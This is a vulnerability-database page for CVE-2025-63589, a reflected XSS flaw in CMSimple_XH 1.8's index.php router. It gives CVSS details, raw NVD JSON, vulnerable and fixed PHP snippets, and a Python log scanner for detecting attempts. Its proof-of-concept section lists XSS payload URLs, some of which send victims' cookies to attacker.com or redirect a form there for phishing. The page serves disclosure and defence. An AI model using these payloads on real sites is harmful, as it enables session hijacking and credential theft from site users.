Security Vulnerability Report
CVE-2025-63589 CVSS 7.1 HIGH

CVE-2025-63589

Published: 2025-11-06 17:15:46
Last Modified: 2025-11-10 17:29:34

Description

A reflected XSS vulnerability exists in CMSimple_XH 1.8's index.php router when attacker-controlled path segments are not sanitized or encoded before being inserted into the generated HTML (navigation links, breadcrumbs, search form action, footer links). An attacker-controlled string placed in the URL path is reflected into multiple HTML elements, allowing execution of arbitrary JavaScript in victims' browsers visiting a crafted URL.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.8.0:-:*:*:*:*:*:* - VULNERABLE
CMSimple_XH 1.8.x < 1.8.1 (if patched)
CMSimple_XH 1.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
<!-- CVE-2025-63589 PoC - Reflected XSS in CMSimple_XH 1.8 -->
<!-- Attack URL: Trigger XSS via URL path reflection -->
<!-- This PoC demonstrates the vulnerability by injecting JavaScript into page navigation elements -->

<!-- Basic XSS Payload -->
<!-- http://target.com/index.php/<script>alert('XSS')</script> -->

<!-- Cookie Theft Payload -->
<!-- http://target.com/index.php/<script>document.location='https://attacker.com/steal?c='+document.cookie</script> -->

<!-- Session Hijacking Payload -->
<!-- http://target.com/index.php/<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)"> -->

<!-- Bypass Sanitization Payload -->
<!-- http://target.com/index.php/"><script>alert(document.domain)</script> -->

<!-- Real-world Attack Scenario -->
<!-- Attacker creates a malicious link and tricks authenticated admin into clicking -->
<!-- http://vulnerable-site.com/index.php/<script>fetch('/admin/settings?cmd=exec',{credentials:'include'})</script> -->

<!-- HTML Injection via Navigation -->
<!-- http://target.com/index.php/"><a href="javascript:alert(1)">Click Me</a> -->

<!-- Stored XSS Preparation via Search Form -->
<!-- http://target.com/index.php/<script>document.forms[0].action='https://attacker.com/phish'</script> -->

<!-- Example of how the vulnerable code might look (vulnerable index.php excerpt) -->
/*
VULNERABLE CODE EXAMPLE:
$path_segment = $_SERVER['REQUEST_URI']; // User input from URL
$nav_html = '<a href="/' . $path_segment . '">Navigation</a>'; // Direct concatenation
$breadcrumbs = '<span>' . $path_segment . '</span>'; // No encoding
$search_action = '<form action="/search' . $path_segment . '">'; // Direct use
echo $nav_html;
echo $breadcrumbs;
echo $search_action;

FIXED CODE EXAMPLE:
$path_segment = htmlspecialchars($_SERVER['REQUEST_URI'], ENT_QUOTES, 'UTF-8');
$nav_html = '<a href="/' . $path_segment . '">Navigation</a>';
$breadcrumbs = '<span>' . $path_segment . '</span>';
$search_action = '<form action="/search">';
echo $nav_html;
echo $breadcrumbs;
echo $search_action;
*/

<!-- Mitigation: Apply HTML encoding to all user-controllable output -->
<!-- Use: htmlspecialchars($input, ENT_QUOTES, 'UTF-8') before output -->
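A log-review check for the path reflection described above, added here as an example and not taken from the advisory or the CMSimple_XH code base: it flags requests whose decoded path after /index.php/ contains HTML metacharacters. The access-log format, the sample entries and all function names are assumptions; the check goes slightly beyond the page by decoding twice so that double-encoded paths are also caught.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line inside a common/combined access-log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Text after /index.php/ in the decoded path: the part the advisory says is reflected.
SEGMENT_RE = re.compile(r"/index\.php/(.*)", re.IGNORECASE | re.DOTALL)
# Characters that alter HTML structure when written into a page unencoded.
HTML_META = set("<>\"'")

def decoded_path(target, rounds=2):
    """Path component of a request target, percent-decoded up to `rounds` times."""
    path = urlsplit(target).path
    for _ in range(rounds):
        once = unquote(path)
        if once == path:
            break
        path = once
    return path

def reflected_segment(target):
    """Decoded path text following /index.php/, or '' if there is none."""
    m = SEGMENT_RE.search(decoded_path(target))
    return m.group(1) if m else ""

def is_suspicious(target):
    """True when the reflected path segment carries HTML metacharacters."""
    return any(ch in HTML_META for ch in reflected_segment(target))

def scan(lines):
    """Return (line_number, request_target) for every suspicious log entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append((number, m.group("target")))
    return hits

# Constructed sample entries (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Nov/2025:10:00:01 +0000] "GET /index.php/Welcome HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Nov/2025:10:00:07 +0000] "GET /index.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 5301',
    '203.0.113.9 - - [06/Nov/2025:10:00:09 +0000] "GET /index.php/%253Cb%253E HTTP/1.1" 200 5298',
    '203.0.113.7 - - [06/Nov/2025:10:00:12 +0000] "GET /index.php?search=%3Cb%3E HTTP/1.1" 200 4980',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: {target}")
```

Page names that legitimately contain quotes will also match, so hits are candidates for review rather than confirmed exploitation attempts.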

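References

https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php (Product)
https://github.com/cybercrewinc/CVE-2025-63589 (Exploit, Third Party Advisory)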

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-63589",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-06T17:15:46.343",
    "lastModified": "2025-11-10T17:29:33.603",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A reflected XSS vulnerability exists in CMSimple_XH 1.8's index.php router when attacker-controlled path segments are not sanitized or encoded before being inserted into the generated HTML (navigation links, breadcrumbs, search form action, footer links). An attacker-controlled string placed in the URL path is reflected into multiple HTML elements, allowing execution of arbitrary JavaScript in victims' browsers visiting a crafted URL."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.8.0:-:*:*:*:*:*:*",
                "matchCriteriaId": "C01EAAD5-77D7-462E-B9AF-7183345844F9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/cmsimple-xh/cmsimple-xh/blob/master/index.php",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://github.com/cybercrewinc/CVE-2025-63589",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/cybercrewinc/CVE-2025-63589",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}